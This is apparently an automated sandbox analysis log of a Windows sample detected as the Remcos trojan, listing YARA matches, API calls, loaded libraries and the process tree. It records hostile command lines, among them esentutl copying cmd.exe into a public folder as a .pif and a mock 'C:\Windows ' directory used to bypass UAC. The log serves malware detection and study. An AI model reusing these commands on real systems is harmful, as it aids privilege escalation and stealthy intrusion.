Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A563000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A534000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC9F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1613117060.0000000002395000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
Source: nft438A5fN.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@39/35@1/2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 11_2_0321798D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 21_2_02E9798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError, 21_2_02E9798D
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02C97FD2 GetDiskFreeSpaceA, 0_2_02C97FD2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0320F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle, 11_2_0320F4AF
Source: C:\Users\user\Desktop\nft438A5fN.exe Code function: 0_2_02CA6DC8 CoCreateInstance, 0_2_02CA6DC8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321B539 FindResourceA,LoadResource,LockResource,SizeofResource, 11_2_0321B539
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 11_2_0321AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 11_2_0321AB9E
Source: C:\Users\user\Desktop\nft438A5fN.exe File created: C:\Users\Public\Libraries\PNO
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4280
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess432
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1376
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\24e0cc18-8175-4616-8ea9-89ad3c39c315
Source: C:\Users\user\Desktop\nft438A5fN.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\nft438A5fN.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: nft438A5fN.exe ReversingLabs: Detection: 57%
Source: nft438A5fN.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\nft438A5fN.exe File read: C:\Users\user\Desktop\nft438A5fN.exe
Source: unknown Process created: C:\Users\user\Desktop\nft438A5fN.exe "C:\Users\user\Desktop\nft438A5fN.exe"
Source: C:\Users\user\Desktop\nft438A5fN.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ovggtquW.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\nft438A5fN.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\nft438A5fN.exe /d C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Users\user\Desktop\nft438A5fN.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown Process created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676
Source: unknown Process created: C:\Users\Public\Libraries\Wuqtggvo.PIF "C:\Users\Public\Libraries\Wuqtggvo.PIF"
Source: C:\Users\Public\Libraries\Wuqtggvo.PIF Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
Source: C:\Windows\SysWOW64\SndVol.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608
Source: C:\Windows\SysWOW64\SndVol.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: url.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nft438A5fN.exe Section loaded: amsi.dll Jump to behavior
